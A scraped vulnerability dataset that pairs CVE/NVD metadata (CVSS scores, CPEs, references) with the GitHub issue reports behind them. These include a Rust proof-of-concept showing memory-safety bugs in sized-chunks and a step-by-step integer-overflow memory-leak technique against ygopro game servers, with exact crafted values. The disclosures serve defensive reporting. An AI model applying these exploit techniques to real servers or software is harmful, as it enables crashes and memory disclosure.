Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. # Description Chunk: * Array size is not checked when constructed with `unit()` and `pair()`. * Array size is not checked when constructed with `From<InlineArray<A, T>>`. * `Clone` and `insert_from` are not panic-safe; A panicking iterator causes memory safety issues with them. InlineArray: * Generates unaligned references for types with a large alignment requirement. # Demonstration * Crate: sized-chunks * Version: 0.6.2 * OS: Ubuntu 18.04.5 LTS * Rust: rustc 1.46.0 (04488afe3 2020-08-24) * Cargo flags: --release ```rust #![forbid(unsafe_code)] mod boilerplate; use sized_chunks::{Chunk, InlineArray}; use typenum::*; #[repr(align(256))] struct LargeAlign(u8); struct DropDetector(u32); impl DropDetector { fn new(num: u32) -> Self { println!("Creating {}", num); DropDetector(num) } } impl Drop for DropDetector { fn drop(&mut self) { println!("Dropping {}", self.0); } } impl Clone for DropDetector { fn clone(&self) -> Self { if self.0 == 42 { panic!("panic on clone") } DropDetector::new(self.0) } } struct PanickingIterator { current: u32, panic_at: u32, len: usize, } impl Iterator for PanickingIterator { type Item = DropDetector; fn next(&mut self) -> Option<Self::Item> { let num = self.current; if num == self.panic_at { panic!("panicking index") } self.current += 1; Some(DropDetector::new(num)) } fn size_hint(&self) -> (usize, Option<usize>) { (self.len, Some(self.len)) } } impl ExactSizeIterator for PanickingIterator {} fn main() { boilerplate::init(); // Some of these cases will panic earlier than assert in debug build due to overflow detection, // but they still have the same error // https://github.com/bodil/sized-chunks/blob/40aa74b824688a4d4b1e1c65a50c679abb58b41e/src/sized_chunk/mod.rs#L153-L177 boilerplate::test_case( "1. Array size is not checked when constructed with `unit()` and `pair()`.", || { let _ = Chunk::<usize, U0>::unit(123); let mut chunk = Chunk::<usize, U0>::pair(123, 456); // Moreover, we can push more elements because `is_full` is implemented as `len != capacity` chunk.push_back(789); println!("len: {}", chunk.len()); assert!(chunk.len() <= U0::USIZE); }, ); // https://github.com/bodil/sized-chunks/blob/40aa74b824688a4d4b1e1c65a50c679abb58b41e/src/sized_chunk/mod.rs#L815-L829 boilerplate::test_case( "2. Array size is not checked when constructed with `From<InlineArray<A, T>>`", || { let mut from = InlineArray::<u8, [u8; 256]>::new(); from.push(1); from.push(2); from.push(3); from.push(4); from.push(5); let to = Chunk::<u8, U0>::from(from); println!("len: {}", to.len()); assert!(to.len() <= U0::USIZE); }, ); // https://github.com/bodil/sized-chunks/blob/40aa74b824688a4d4b1e1c65a50c679abb58b41e/src/sized_chunk/mod.rs#L120-L134 boilerplate::test_case("3-1. `Chunk::clone()` is not panic-safe", || { let mut chunk = Chunk::<DropDetector, U3>::new(); chunk.push_back(DropDetector::new(42)); chunk.push_back(DropDetector::new(43)); // observe the difference between creating and dropping log // uninitialized memory is dropped while unwinding println!("=> Dropping uninitialized memory"); let _ = chunk.clone(); }); // https://github.com/bodil/sized-chunks/blob/40aa74b824688a4d4b1e1c65a50c679abb58b41e/src/sized_chunk/mod.rs#L564-L617 boilerplate::test_case("3-2. `Chunk::insert_from()` is not panic-safe", || { let mut chunk = Chunk::<DropDetector, U5>::new(); chunk.push_back(DropDetector::new(1)); chunk.push_back(DropDetector::new(2)); chunk.push_back(DropDetector::new(3)); println!("=> Double-free of `DropDetector(2)`"); chunk.insert_from( 1, PanickingIterator { current: 1, panic_at: 1, len: 1, }, ); }); boilerplate::test_case("4. `InlineArray` generates unaligned references for types with a large alignment requirement.", || { let mut arr = InlineArray::<LargeAlign, [usize; 256]>::new(); arr.push(LargeAlign(0)); boilerplate::assert_aligned(arr.get(0).unwrap()); }); // Other issues that should be fixed but probably minor to include in the advisory: // https://github.com/bodil/sized-chunks/blob/40aa74b824688a4d4b1e1c65a50c679abb58b41e/src/sized_chunk/mod.rs#L564-L617 // `insert_from` relies on the behavioral correctness of `ExactSizeIterator`. // However, `ExactSizeIterator` is a safe trait, which has the same safety guarantee with `size_hint()`. // Programs should not assume that they will yield a correct value in unsafe code. // From Rust std doc: "An incorrect implementation of `size_hint()` should not lead to memory safety violations." // // Applying `take(insert_size)` and adjusting `left` and `right` field based on the number of items that are actually moved // (instead of using `insert_size`) will fix the problem. // https://github.com/bodil/sized-chunks/blob/40aa74b824688a4d4b1e1c65a50c679abb58b41e/src/inline_array/mod.rs#L167 // This states an actual contract, so it should be `assert!()` instead of `debug_assert!()` // From Rust std doc: "Replacing `assert!` with `debug_assert!` is thus only encouraged after thorough profiling, and more importantly, only in safe code!" } ``` Output: ``` ----------------------------------------------------------------------------- | 1. Array size is not checked when constructed with `unit()` and `pair()`. | ----------------------------------------------------------------------------- len: 334 thread 'main' panicked at 'assertion failed: chunk.len() <= U0::USIZE', src/main.rs:109:13 note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace -------------------------------------------------------------------------------- | 2. Array size is not checked when constructed with `From<InlineArray<A, T>>` | -------------------------------------------------------------------------------- len: 18446744052167409156 thread 'main' panicked at 'assertion failed: to.len() <= U0::USIZE', src/main.rs:126:13 ------------------------------------------- | 3-1. `Chunk::clone()` is not panic-safe | ------------------------------------------- Creating 42 Creating 43 => Dropping uninitialized memory thread 'main' panicked at 'panic on clone', src/main.rs:59:13 Dropping 150495608 Dropping 32764 Dropping 42 Dropping 43 ------------------------------------------------- | 3-2. `Chunk::insert_from()` is not panic-safe | ------------------------------------------------- Creating 1 Creating 2 Creating 3 => Double-free of `DropDetector(2)` thread 'main' panicked at 'panicking index', src/main.rs:78:13 Dropping 1 Dropping 2 Dropping 2 ------------------------------------------------------------------------------------------------- | 4. `InlineArray` generates unaligned references for types with a large alignment requirement. | ------------------------------------------------------------------------------------------------- thread 'main' panicked at 'Reference is not aligned - addr: 0x7ffc08f859e8, align: 0x100', src/boilerplate.rs:46:9 ``` Return Code: 0
Multiple soundness issues in Chunk and InlineArray
https://api.github.com/repos/bodil/sized-chunks/issues/11/comments
5
2020-09-06T22:04:56Z
2021-02-14T12:05:33Z
https://github.com/bodil/sized-chunks/issues/11
694,545,650
11
1,436
CVE-2020-25821
2020-09-23T04:15:11.133
peg-markdown 0.4.14 has a NULL pointer dereference in process_raw_blocks in markdown_lib.c. NOTE: This vulnerability only affects products that are no longer supported by the maintainer
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jgm/peg-markdown/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jgm/peg-markdown/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:peg-markdown_project:peg-markdown:0.4.14:*:*:*:*:*:*:*", "matchCriteriaId": "DA66F7CE-832C-4C4E-9130-D29FCA545582", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/jgm/peg-markdown/issues/43
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jgm", "peg-markdown" ]
Hi, While fuzzing peg-markdown with Honggfuzz, I found a NULL pointer dereference in the process_raw_blocks() function. Attaching a reproducer (gzipped so GitHub accepts it): [test01.md.gz](https://github.com/jgm/peg-markdown/files/5254664/test01.md.gz) Issue can be reproduced by running: ``` markdown test01.md ``` ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==641623==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x00000056945a bp 0x7ffeff8c0680 sp 0x7ffeff8c05b0 T0) ==641623==The signal is caused by a READ memory access. ==641623==Hint: address points to the zero page. #0 0x56945a in process_raw_blocks /home/fcambus/peg-markdown/markdown_lib.c:131:41 #1 0x569616 in process_raw_blocks /home/fcambus/peg-markdown/markdown_lib.c:139:33 #2 0x569089 in markdown_to_g_string /home/fcambus/peg-markdown/markdown_lib.c:161:14 #3 0x5696e0 in markdown_to_string /home/fcambus/peg-markdown/markdown_lib.c:177:11 #4 0x4c4bbc in main /home/fcambus/peg-markdown/markdown.c:180:11 #5 0x7f71b46590b2 in __libc_start_main /build/glibc-YYA7BZ/glibc-2.31/csu/../csu/libc-start.c:308:16 #6 0x41c43d in _start (/home/fcambus/peg-markdown/markdown+0x41c43d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fcambus/peg-markdown/markdown_lib.c:131:41 in process_raw_blocks ==641623==ABORTING ```
NULL pointer dereference in the process_raw_blocks() function
https://api.github.com/repos/jgm/peg-markdown/issues/43/comments
2
2020-09-21T10:01:11Z
2021-03-27T09:00:24Z
https://github.com/jgm/peg-markdown/issues/43
705,455,420
43
1,437
CVE-2020-24213
2020-09-23T15:15:15.223
An integer overflow was discovered in YGOPro ygocore v13.51. Attackers can use it to leak the game server thread's memory.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Fluorohydride/ygopro/issues/2314" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Fluorohydride/ygopro/issues/2314" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ygopro:ygocore:1.035.1:*:*:*:*:*:*:*", "matchCriteriaId": "DB7E411F-6738-424D-A211-AF076FDD2FFA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/Fluorohydride/ygopro/issues/2314
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Fluorohydride", "ygopro" ]
#### Memory leak This vulnerability happened when the function "SingleDuel::UpdateDeck" and "SingleDuel::PlayerReady" been used. When the player sends a package with error 'mainc' size and 'sidec' size, the function "SingleDuel::UpdateDeck" haven't check those parameters is legal or not. Then this function will calculate the sum of those parameters. ```c void SingleDuel::UpdateDeck(DuelPlayer* dp, void* pdata, unsigned int len) { if(dp->type > 1 || ready[dp->type]) return; char* deckbuf = (char*)pdata; int mainc = BufferIO::ReadInt32(deckbuf); // main_len int sidec = BufferIO::ReadInt32(deckbuf); // side_len // verify data if((unsigned)mainc + (unsigned)sidec > (len - 8) / 4) { STOC_ErrorMsg scem; scem.msg = ERRMSG_DECKERROR; scem.code = 0; NetServer::SendPacketToPlayer(dp, STOC_ERROR_MSG, scem); return; } if(duel_count == 0) { deck_error[dp->type] = deckManager.LoadDeck(pdeck[dp->type], (int*)deckbuf, mainc, sidec); } else { if(deckManager.LoadSide(pdeck[dp->type], (int*)deckbuf, mainc, sidec)) { ready[dp->type] = true; NetServer::SendPacketToPlayer(dp, STOC_DUEL_START); if(ready[0] && ready[1]) { NetServer::SendPacketToPlayer(players[tp_player], STOC_SELECT_TP); players[1 - tp_player]->state = 0xff; players[tp_player]->state = CTOS_TP_RESULT; duel_stage = DUEL_STAGE_FIRSTGO; } } else { STOC_ErrorMsg scem; scem.msg = ERRMSG_SIDEERROR; scem.code = 0; NetServer::SendPacketToPlayer(dp, STOC_ERROR_MSG, scem); } } } ``` The algorithm thinks 'mainc' and 'sidec' are two unsigned number, so there is an integer overflow, when we set those parameters like (1, -1), their sum will be zero. It is ok though but in the function "deckManager.LoadDeck", it will cause a buffer overread. ```c int DeckManager::LoadDeck(Deck& deck, int* dbuf, int mainc, int sidec) { deck.clear(); int code; int errorcode = 0; CardData cd; for(int i = 0; i < mainc; ++i) { code = dbuf[i]; if(!dataManager.GetData(code, &cd)) { errorcode = code; continue; } if(cd.type & TYPE_TOKEN) continue; else if(cd.type & (TYPE_FUSION | TYPE_SYNCHRO | TYPE_XYZ | TYPE_LINK) && deck.extra.size() < 15) { deck.extra.push_back(dataManager.GetCodePointer(code)); //verified by GetData() } else if(deck.main.size() < 60) { deck.main.push_back(dataManager.GetCodePointer(code)); } } for(int i = 0; i < sidec; ++i) { code = dbuf[mainc + i]; if(!dataManager.GetData(code, &cd)) { errorcode = code; continue; } if(cd.type & TYPE_TOKEN) continue; if(deck.side.size() < 15) deck.side.push_back(dataManager.GetCodePointer(code)); //verified by GetData() } return errorcode; } ``` We can see in this function, the parameters 'mainc' and 'sidec' were treat as two int type numbers. So if we set 'mainc' as '0x7fffffff' and 'sidec' as '0x80000001', in this function it will read 'dbuf' from range 0 to 2147483647. Function "DeckManager::LoadDeck" also do a important thing: If the memory's data can be found in "dataManager.GetData" function, then it will add it into 'deck'; Else if "dataManager.GetData" function can't find memory's data in database, it will record it in the errorcode and return. Then in the "SingleDuel::UpdateDeck" function, the errorcode will be writen into 'deck_error[dp->type]'. Now we can see the function "SingleDuel::PlayerReady". ```c void SingleDuel::PlayerReady(DuelPlayer* dp, bool is_ready) { if(dp->type > 1) return; if(ready[dp->type] == is_ready) return; if(is_ready) { unsigned int deckerror = 0; if(!host_info.no_check_deck) { if(deck_error[dp->type]) { deckerror = (DECKERROR_UNKNOWNCARD << 28) + deck_error[dp->type]; } else { bool allow_ocg = host_info.rule == 0 || host_info.rule == 2; bool allow_tcg = host_info.rule == 1 || host_info.rule == 2; deckerror = deckManager.CheckDeck(pdeck[dp->type], host_info.lflist, allow_ocg, allow_tcg); } } if(deckerror) { STOC_HS_PlayerChange scpc; scpc.status = (dp->type << 4) | PLAYERCHANGE_NOTREADY; NetServer::SendPacketToPlayer(dp, STOC_HS_PLAYER_CHANGE, scpc); STOC_ErrorMsg scem; scem.msg = ERRMSG_DECKERROR; scem.code = deckerror; NetServer::SendPacketToPlayer(dp, STOC_ERROR_MSG, scem); return; } } ready[dp->type] = is_ready; STOC_HS_PlayerChange scpc; scpc.status = (dp->type << 4) | (is_ready ? PLAYERCHANGE_READY : PLAYERCHANGE_NOTREADY); NetServer::SendPacketToPlayer(players[dp->type], STOC_HS_PLAYER_CHANGE, scpc); if(players[1 - dp->type]) NetServer::SendPacketToPlayer(players[1 - dp->type], STOC_HS_PLAYER_CHANGE, scpc); for(auto pit = observers.begin(); pit != observers.end(); ++pit) NetServer::SendPacketToPlayer(*pit, STOC_HS_PLAYER_CHANGE, scpc); #ifdef YGOPRO_SERVER_MODE if(cache_recorder) NetServer::SendPacketToPlayer(cache_recorder, STOC_HS_PLAYER_CHANGE, scpc); if(replay_recorder) NetServer::SendPacketToPlayer(replay_recorder, STOC_HS_PLAYER_CHANGE, scpc); #endif } ``` This function will check 'deck_error[dp->type]', if it is not zero, it will pack the errcode into 'scem' structure and send it to players. Thanks to it, we can get an easy way to leak the program memory. And here is my test program, it works well in my local environment. https://github.com/ChinaBluecat/ygo-fuzz-frame
Security Issue: Memory leak.
https://api.github.com/repos/Fluorohydride/ygopro/issues/2314/comments
11
2020-07-31T14:38:56Z
2024-05-31T13:52:07Z
https://github.com/Fluorohydride/ygopro/issues/2314
669,885,569
2,314
1,438
CVE-2020-15930
2020-09-24T19:15:11.713
An XSS issue in Joplin desktop 1.0.190 to 1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/159316/Joplin-1.0.245-Cross-Site-Scripting-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/laurent22/joplin/issues/3552" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/laurent22/joplin/releases/tag/v1.1.4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/159316/Joplin-1.0.245-Cross-Site-Scripting-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/laurent22/joplin/issues/3552" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/laurent22/joplin/releases/tag/v1.1.4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:joplin_project:joplin:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A337333-8FE3-4A1D-8039-A26AC351AA07", "versionEndExcluding": null, "versionEndIncluding": "1.0.245", "versionStartExcluding": null, "versionStartIncluding": "1.0.190", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/laurent22/joplin/issues/3552
[ "Third Party Advisory" ]
github.com
[ "laurent22", "joplin" ]
I'm opening this issue for future disclosure regarding the vulnerability reported via e-mail.
Security Vulnerability
https://api.github.com/repos/laurent22/joplin/issues/3552/comments
8
2020-07-23T21:23:41Z
2020-09-27T18:25:53Z
https://github.com/laurent22/joplin/issues/3552
664,774,612
3,552
1,439
CVE-2016-11086
2020-09-24T20:15:12.257
lib/oauth/consumer.rb in the oauth-ruby gem through 0.5.4 for Ruby does not verify server X.509 certificates if a certificate bundle cannot be found, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/oauth-xx/oauth-ruby/issues/137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/oauth-xx/oauth-ruby/issues/137" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oauth-ruby_project:oauth-ruby:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "2F962A48-C937-46DB-A97B-C1D71BC8C3DA", "versionEndExcluding": null, "versionEndIncluding": "0.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/oauth-xx/oauth-ruby/issues/137
[ "Exploit", "Third Party Advisory" ]
github.com
[ "oauth-xx", "oauth-ruby" ]
While analysing the source code of some third party libraries we use in our projects, I found an issue with the way certificate validation is handled in this library. If the certificate bundle cannot be found on the file system at three known/specified locations, then it silently falls back to a mode (i.e. `OpenSSL::SSL::VERIFY_NONE`) in which the certificate and the certificate chain aren't validated at all. See the following code fragments copied from `lib/oauth/consumer.rb`. If the environment variable `SSL_CERT_FILE` is not set, and no file can be found in the three specified locations, then `CA_FILE` is assigned `nil`. If you then look at the second code fragment, you can see that `verify_mode` will be set to `VERIFY_NONE` if `CA_FILE` equals `nil` and if the user hasn't explicitly set `ca_file` in the `options` object. Lines [11-18](https://github.com/oauth-xx/oauth-ruby/blob/e397b3e2f540faaebd7912aeb2768835d151f795/lib/oauth/consumer.rb#L11-L18): ```ruby # determine the certificate authority path to verify SSL certs CA_FILES = %W(#{ENV['SSL_CERT_FILE']} /etc/ssl/certs/ca-certificates.crt /etc/pki/tls/certs/ca-bundle.crt /usr/share/curl/curl-ca-bundle.crt) CA_FILES.each do |ca_file| if File.exist?(ca_file) CA_FILE = ca_file break end end CA_FILE = nil unless defined?(CA_FILE) ``` Lines [333-339](https://github.com/oauth-xx/oauth-ruby/blob/e397b3e2f540faaebd7912aeb2768835d151f795/lib/oauth/consumer.rb#L333-L339): ```ruby if @options[:ca_file] || CA_FILE http_object.ca_file = @options[:ca_file] || CA_FILE http_object.verify_mode = OpenSSL::SSL::VERIFY_PEER http_object.verify_depth = 5 else http_object.verify_mode = OpenSSL::SSL::VERIFY_NONE end ``` I would expect a library to fail hard (i.e. throw an exception) in this case, and not silently fall back to an insecure mode. Also, it might be a good idea to embed a certificate bundle (e.g. https://curl.haxx.se/ca/cacert.pem) in the library itself. If no system certificate bundle can be found, then you could always fall back to the embedded certificate bundle. Let me know if you do have questions.
Certificate and chain not validated if certificate bundle cannot be found
https://api.github.com/repos/oauth-xx/oauth-ruby/issues/137/comments
4
2016-12-01T21:59:30Z
2021-10-31T22:28:41Z
https://github.com/oauth-xx/oauth-ruby/issues/137
192,974,378
137
1,440
CVE-2019-20921
2020-09-30T18:15:18.007
bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-9r7h-6639-v5mw" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/snapappointments/bootstrap-select/issues/2199" }, { "source": "cve@mitre.org", "tags": null, "url": "https://issues.jtl-software.de/issues/SHOP-7964" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.npmjs.com/advisories/1522" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/advisories/GHSA-9r7h-6639-v5mw" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/snapappointments/bootstrap-select/issues/2199" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.npmjs.com/advisories/1522" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:snapappointments:bootstrap-select:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "72F562DB-EA28-45BF-BFBA-FFC00C570092", "versionEndExcluding": "1.13.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/snapappointments/bootstrap-select/issues/2199
[ "Patch", "Third Party Advisory" ]
github.com
[ "snapappointments", "bootstrap-select" ]
The bootstrap-select does not respect escaped content correctly. Instead the escaped content is rendered as it would not be escaped. Sample can be seen here: https://jsfiddle.net/b1dhf8ec/2/
Escaped tags parsed as non-escaped in title and data-content
https://api.github.com/repos/snapappointments/bootstrap-select/issues/2199/comments
7
2019-02-14T11:10:30Z
2020-10-01T03:02:55Z
https://github.com/snapappointments/bootstrap-select/issues/2199
410,247,803
2,199
1,441
CVE-2020-21244
2020-09-30T18:15:23.817
An issue was discovered in FrontAccounting 2.4.7. There is a Directory Traversal vulnerability that can empty folder via admin/inst_lang.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FrontAccountingERP/FA/issues/40" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FrontAccountingERP/FA/issues/40" } ]
